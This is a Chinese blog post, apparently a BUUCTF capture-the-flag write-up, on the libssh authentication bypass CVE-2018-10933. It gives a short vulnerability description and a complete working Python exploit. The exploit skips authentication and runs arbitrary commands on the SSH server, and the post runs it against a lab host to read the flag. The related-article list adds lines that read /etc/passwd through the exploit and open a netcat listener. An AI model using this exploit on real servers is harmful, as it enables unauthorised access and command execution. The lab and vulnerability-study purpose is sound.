buuctf [Libssh]CVE-2018-10933

最新推荐文章于 2024-04-17 09:56:14 发布
最新推荐文章于 2024-04-17 09:56:14 发布
阅读量343 收藏
点赞数 1
分类专栏: buuctf real 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115273045
版权
本文详细介绍了libssh库中的CVE-2018-10933安全漏洞,该漏洞允许攻击者在无需凭证的情况下进行身份验证。影响版本为libssh 0.7.6之前和0.8.4之前的服务器端。通过发送SSH2_MSG_USERAUTH_SUCCESS消息,攻击者可执行任意命令。提供的Python代码示例展示了如何复现此漏洞。
摘要由CSDN通过智能技术生成

漏洞描述

2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题

libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。
https://blog.csdn.net/xuandao_ahfengren/article/details/83476612
https://www.codercto.com/a/33159.html

漏洞影响

libssh的server-side state machine 0.7.6之前版本和0.8.4

在这里插入图片描述
漏洞复现

exp
CVE-2018-10933.py

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

使用python3执行,即可在目标服务器上执行任意命令:

python exp.py node3.buuoj.cn 29309 “env”
在这里插入图片描述
在这里插入图片描述
拿到flag!

exploitsec
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-10933:使用CVE-2018-10933LibSSH)无需任何凭据即可生成shell
03-02
libSSH身份验证-绕过 使用CVE-2018-10933无需任何凭据即可生成shell 漏洞数据库: : libSSH有关CVE-2018-10933的信息: ://www.libssh.org/security/advisories/CVE-2018-10933.txt libSSH发行的Bugfix: ://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/ 用法 // If paramiko==2.0.8 doesn't works try : pip install paramiko==2.4.2 pip install -r requirements.txt python libsshauthbypass.py --help Example: python l
libssh 认证绕过漏洞(cve-2018-10933)分析
whatday的专栏
08-25 2037
最近出了一个libSSH认证绕过漏洞,刚开始时候看的感觉这洞可能挺厉害的,然后很快github上面就有PoC了,msf上很快也添加了exp,但是在使用的过程中发现无法getshell,对此,我进行了深入的分析研究。 前言 360发了一篇分析文章,有getshell的图: Python版本的PoC到Github上搜一下就有了: https://github.com/search?utf8=%E2%9C%93&q=CVE-2018-10933&type= 环境 libSSH-0.
libssh 服务端权限认证绕过(CVE-2018-10933)
m0_65150886的博客
12-27 406
相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。官方已发布不受影响版本。已修复版本Libssh 0.8.4和0.7.6下载链接如下:https://www.libssh.org/files。2.poc利用,python poc.Sh ip port ‘命令’注意:使用OpenSSHSSH服务不受影响。1.访问ip:port,显示无法使用此页面。
利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933
JiangBuLiu的博客
07-12 1870
libssh 服务端权限认证绕过漏洞(CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md 漏洞原理 libssh是一个提供ssh相...
Libssh_0.8.3 service
战神/calmness的博客
06-22 139
信息探测 使用EXP wget https://raw.githubusercontent.com/backlion/CVE-2018-10933/master/libsshCVE-2018-10933.py Get username and password Python3 libssh-CVE-2018-10933.py <IP> <Port> “cat /etc/passwd 提权 nc -lnvp 1234 hostname &&amp...
libssh2-1.11.0 x64 Windows版 动态/静态lib
01-09
libssh2-1.11.0 x64 Win版 动态/静态lib Release版 三个文件: 静态库 libssh2_static.lib 动态库 libssh2.dll libssh2.lib 头文件 libssh2.h libssh2_publickey.h libssh2_sftp.h 附:------- 已启动生成… 1>-----...
K8 weblogic-CVE-2018-2628-getshell工具
07-13
【K8 weblogic-CVE-2018-2628-getshell工具】是一款针对Oracle WebLogic服务器的渗透测试工具,主要用于检测和利用CVE-2018-2628安全漏洞获取服务器的shell控制权。这个工具集成了漏洞的详细利用过程,包括图片教程...
libssh2-devel-1.4.2-2.el6_7.1安装包.rar
02-17
yum install libssh2-devel的时候提示如下的信息,安装附件中的包可以进行解决 Total download size: 2.0 M Installed size: 5.0 M Is this ok [y/N]: y Downloading Packages: Error Downloading ...
libssh2-1.9.0.rar
05-07
**libssh2库详解** `libssh2`是一个开源的C语言库,它实现了SSH2协议,用于在不同系统之间安全地传输数据。这个库广泛应用于各种需要远程控制、文件传输或者加密通信的软件开发中。`libssh2-1.9.0`是该库的一个特定...
新的LibSSH漏洞允许黑客在无需密码的情况下接管你的服务器
mozhe_的博客
10-19 542
LibSSH官方在本周二(10月16日)发布的安全公告中披露了一个已存在四年之久的高风险漏洞,它允许攻击者绕过身份验证,在不需要密码的情况下获取对受该漏洞影响服务器的完全控制权限。 LibSSH是一个C 函数库,用于实现SSH2协议。这个新的安全漏洞被追踪为CVE-2018-10933,是一个在2014年初发布的Libssh 0.6版本中引入的SSH2登陆身份验证绕过漏洞。 根据周二发布的安全...
cve-2018-2628 exp getshell
05-21
cve-2018-2628 exp getshell
libssh 服务端权限认证绕过漏洞(CVE-2018-10933
EC_Carrot的博客
07-08 749
漏洞简介 libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标SSH服务器。 漏洞复现 我们直接用Poc来复现: 来源于:https://github.com/vulhub/vulhub/tree/master/libssh/CVE-2018-10933 #!/usr/bin/env python3 import sys import paramiko impo
探索CVE-2018-10933:一个开源的安全研究与学习平台
最新发布
gitblog_00052的博客
04-17 328
探索CVE-2018-10933:一个开源的安全研究与学习平台 项目地址:https://gitcode.com/blacknbunny/CVE-2018-10933 在网络安全的世界里,了解并应对漏洞是至关重要的。今天,我们将深入探讨一个开源项目,它专注于研究和学习一个特定的漏洞——CVE-2018-10933。该项目由GitHub上的用户blacknbunny创建,旨在帮助技术爱好者、安全研究...
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现
Senimo
05-03 2077
CVE-2018-10933 libssh 服务端权限认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。 二、漏洞影响 libssh 0.6 及更高版本具有身份验证绕过漏洞。 libssh 版本 0.8.4 和 libssh
CVE-2018-10933 身份验证绕过漏洞验证
玄道的网安博客
10-28 6879
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
s2 安恒 漏洞验证工具_CVE-2018-10933 身份验证绕过漏洞验证
weixin_39654823的博客
12-20 158
CVE-2018-10933 身份验证绕过漏洞验证发布时间:2018-10-28 17:54,浏览次数:422, 标签:CVE0x00 事件背景2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的...
CVE-2014-9222
07-28
CVE-2014-9222是一种安全漏洞,攻击者可以利用该漏洞通过路由管理协议TR-069的7547端口发送恶意流量来控制设备。\[2\]这个漏洞的存在使得攻击者能够绕过身份验证并执行未经授权的操作。\[3\]如果你想进一步了解这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值